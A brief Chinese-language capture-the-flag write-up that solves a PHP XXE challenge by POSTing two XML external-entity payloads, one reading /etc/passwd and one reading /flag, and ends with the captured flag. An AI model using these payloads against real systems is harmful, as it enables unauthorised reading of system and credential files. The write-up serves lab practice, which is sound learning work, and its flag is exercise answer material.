访问靶场是个phpinfo()页面

 题目提示是PHP的XXE，访问simplexml_load_string.php文件

get请求是空白，要使用post方法请求

尝试读取文件,读取/etc/passwd文件

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>
<name>
&xxe;
</name></test>

可以读取，直接读取/flag文件

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag">
]>
<test>
<name>
&xxe;
</name></test>

 

拿下

flag{35051fe183054e559276a77062bc0092}